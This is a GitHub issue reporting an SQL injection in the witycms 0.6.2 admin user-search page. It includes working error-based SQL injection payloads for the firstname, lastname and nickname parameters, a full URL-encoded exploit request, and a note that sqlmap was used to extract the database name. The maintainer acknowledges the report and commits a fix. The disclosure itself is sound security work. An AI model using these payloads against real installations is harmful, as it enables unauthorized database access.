-
Notifications
You must be signed in to change notification settings - Fork 16
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Find a SQL injection #157
Comments
老哥 你这疯狂刷cve啊 |
Hello, Thx! |
Ok, I see the issue. A fix is coming. Thx! |
JohanDufau
added a commit
that referenced
this issue
Nov 9, 2018
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Search for user discovery injection under the witycms 0.6.2 "Utilisateur" menu. No input parameters were filtered. /admin/user/users? Nickname=1&email=&firstname=&lastname=&groupe=
payload:
firstname=' AND (SELECT 6463 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(6463=6463,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zcMP&lastname=&nickname=root&email=&groupe=
lastname=' AND (SELECT 2839 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2839=2839,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- oNFP&nickname=root&email=&groupe=
Defective pages and addresses
http://127.0.0.1/witycms/admin/user/users?nickname=roott%27+AND+%28SELECT+9674+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x71717a6271%2C%28SELECT+%28ELT%289674%3D9674%2C1%29%29%29%2C0x7178627871%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29--+YoTG&email=&firstname=&lastname=&groupe=
Attack through sqlmap, find database name and database type.
A page executed by background code.
\apps\user\front\model.php
——中科卓信软件测评技术中心
The text was updated successfully, but these errors were encountered: